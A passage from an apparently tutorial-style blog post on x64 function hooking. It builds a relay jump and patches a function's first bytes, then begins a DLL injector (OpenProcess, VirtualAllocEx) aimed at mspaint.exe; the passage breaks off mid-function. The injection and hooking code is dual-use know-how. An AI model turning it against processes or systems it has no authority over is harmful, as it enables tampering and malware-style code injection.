<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
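<p>If the search order in AllocatePageNearAddress() is hard to picture, here’s a portable sketch that only lists the page addresses it would try, nearest first, alternating above and below the target. It doesn’t call VirtualAlloc() or allocate anything. CandidatePages() and its parameters are hypothetical names for illustration, and the address limits are passed in rather than read from GetSystemInfo().</p>

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical sketch of the search order only: no memory is allocated.
// Returns up to `count` page addresses to try, nearest to targetAddr first.
inline std::vector<uint64_t> CandidatePages(uint64_t targetAddr, uint64_t pageSize,
                                            uint64_t lowestAllowed, uint64_t highestAllowed,
                                            size_t count)
{
    assert(pageSize != 0 && (pageSize & (pageSize - 1)) == 0); // must be a power of two

    const uint64_t kReach = 0x7FFFFF00; // just under 2GB, same constant as the post
    const uint64_t startPage = targetAddr & ~(pageSize - 1); // round down to page boundary

    // clamp the window to addresses that a 32 bit relative jmp can reach
    const uint64_t windowLow = (startPage > kReach) ? startPage - kReach : 0;
    const uint64_t minAddr = std::max(lowestAllowed, windowLow);
    const uint64_t maxAddr = std::min(highestAllowed, startPage + kReach);

    std::vector<uint64_t> pages;
    for (uint64_t pageOffset = 1; pages.size() < count; ++pageOffset)
    {
        const uint64_t byteOffset = pageOffset * pageSize;
        const uint64_t highAddr = startPage + byteOffset;
        const uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        const bool highOk = highAddr < maxAddr;
        const bool lowOk = lowAddr > minAddr;
        if (!highOk && !lowOk)
            break; // the window is exhausted in both directions

        if (highOk)
            pages.push_back(highAddr);
        if (lowOk && pages.size() < count)
            pages.push_back(lowAddr);
    }
    return pages;
}
```

<p>The real function hands each of these addresses to VirtualAlloc() in turn and returns the first one that succeeds, so in practice the relay page usually ends up only a handful of pages away from the hooked function.</p>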
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="c1">//mov r10, addr</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="c1">//jmp r10</span>
<span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunction</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the relay function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
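<p>When a hook like this misbehaves, it helps to read the bytes back and check where each jump actually lands. The sketch below decodes both halves of the chain from plain byte buffers. DecodeRelJumpTarget() and DecodeAbsJumpTarget() are hypothetical debugging helpers, not part of the example project, and they assume the exact 5 byte and 13 byte encodings used in this post.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Hypothetical helper: given the address of an "E9 rel32" jmp and its 5 bytes,
// returns the address the jmp lands on.
inline uint64_t DecodeRelJumpTarget(uint64_t jmpAddr, const uint8_t jmp[5])
{
    assert(jmp[0] == 0xE9);
    int32_t rel;
    std::memcpy(&rel, jmp + 1, sizeof(rel));
    // the offset is relative to the instruction after the jmp, and may be negative
    return jmpAddr + 5 + (int64_t)rel;
}

// Hypothetical helper: given the 13 relay bytes (mov r10, imm64; jmp r10),
// returns the absolute address stored in the mov.
inline uint64_t DecodeAbsJumpTarget(const uint8_t relay[13])
{
    assert(relay[0] == 0x49 && relay[1] == 0xBA);                       // mov r10, imm64
    assert(relay[10] == 0x41 && relay[11] == 0xFF && relay[12] == 0xE2); // jmp r10
    uint64_t addr;
    std::memcpy(&addr, relay + 2, sizeof(addr));
    return addr;
}
```

<p>If everything was installed correctly, decoding the first 5 bytes of the hooked function should give the address of the relay page, and decoding the relay should give the address of the payload function.</p>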
<p>With a bit of copy and paste magic, all the code snippets until now can be combined into our first example program. The end result is a small program that ends up calling ReturnRed() whenever we try to call AddColors(). The full code for this example is included in the expandable box below. Note that since this example creates x64 specific instructions for the relay function, it won’t work if it’s built as a 32 bit application. This will be the same for every example we build in this post.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Code For Example 1 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <Windows.h>
#include <stdint.h>
#include <stdio.h>
#include <memoryapi.h>
</span>
<span class="cp">#include <gdiplus.h>
#pragma comment (lib, "Gdiplus.lib")
</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">a</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">r</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x00FF0000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">g</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x0000FF00</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">b</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x000000FF</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">));</span>
<span class="k">return</span> <span class="n">a</span> <span class="o">|</span> <span class="n">r</span> <span class="o">|</span> <span class="n">g</span> <span class="o">|</span> <span class="n">b</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mh">0xffff0000</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="c1">//clamp the search window to addresses that are both valid and within reach of a 32 bit relative jmp</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">((</span><span class="n">startAddr</span> <span class="o">></span> <span class="mh">0x7FFFFF00</span><span class="p">)</span> <span class="o">?</span> <span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span> <span class="o">:</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="c1">//mov r10, addr</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="c1">//jmp r10</span>
<span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunction</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the relay function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">AddColors</span><span class="p">,</span> <span class="n">ReturnRed</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">col</span> <span class="o">=</span> <span class="n">AddColors</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="mh">0x000000FF</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">col</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
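<p>The 5 byte jump that InstallHook() writes can also be looked at in isolation. The sketch below is not part of the example program: EncodeRelativeJump32() is a hypothetical helper, and the addresses in the usage note are made up. It builds the same E9 instruction, but also checks that the target is within reach of a 32 bit offset, which is the reason the relay function has to be allocated near the function being hooked.</p>

```c
#include <stdint.h>

// Hypothetical helper (not from the example program): fills out[5] with an
// E9 rel32 jump located at address `from` that lands on address `to`.
// Returns 1 on success, 0 if `to` is too far away for a 32 bit offset.
int EncodeRelativeJump32(uint64_t from, uint64_t to, uint8_t out[5])
{
    // the offset is measured from the instruction immediately AFTER the 5 byte jmp
    int64_t offset = (int64_t)(to - (from + 5));
    if (offset < INT32_MIN || offset > INT32_MAX)
    {
        return 0; // out of range for a 32 bit relative jump
    }

    uint32_t bits = (uint32_t)(int32_t)offset;
    out[0] = 0xE9; // opcode for jmp rel32
    for (int i = 0; i < 4; ++i)
    {
        out[1 + i] = (uint8_t)(bits >> (8 * i)); // operand is stored little endian
    }
    return 1;
}
```

<p>For example, encoding a jump from 0x7FF600001000 to a relay function at 0x7FF600000000 produces the bytes E9 FB EF FF FF, while a target more than 2GB away makes the function return 0.</p>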
<p>This is all we need to know to start installing hooks in programs we have source access to, but there’s an annoying gap between that and being able to hook a running instance of a program. We’ll bridge that gap with the next example.</p>
<h2 id="example-2-hooking-functions-in-a-running-program">Example 2: Hooking Functions in a Running Program</h2>
<p>The second example program we’re going to build will disable the “Edit With Paint3D” button in a running instance of mspaint.exe.</p>
<p>There are 2 new hurdles we have to overcome in order to install a hook in a running program: getting the target program to execute our hooking logic, and figuring out the address of the function we want to hook. We’ll tackle these in order.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/nopaint3d.gif" />
Our mission is to keep the Paint3D button from accomplishing its mission.
<br /><br />
</div>
<h3 id="getting-code-into-a-running-process">Getting Code Into a Running Process</h3>
<p>The simplest way to get an arbitrary process to execute hooking logic is to build that logic into a DLL and use DLL injection to get that code into the target process’ memory.</p>
<p>The nuts and bolts of how DLL injection works are beyond the scope of this blog post, but if you want to learn more, check out <a href="http://deniable.org/windows/inject-all-the-things">this article</a>. I’ve included the code for a basic DLL injection program in the collapsible box below. This is the code that the example program will use to inject its dll into mspaint.exe.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DLL Injection Code (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <string.h> //for strlen and strcmp
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
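<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//+1 so the null terminator gets copied too</span>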
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
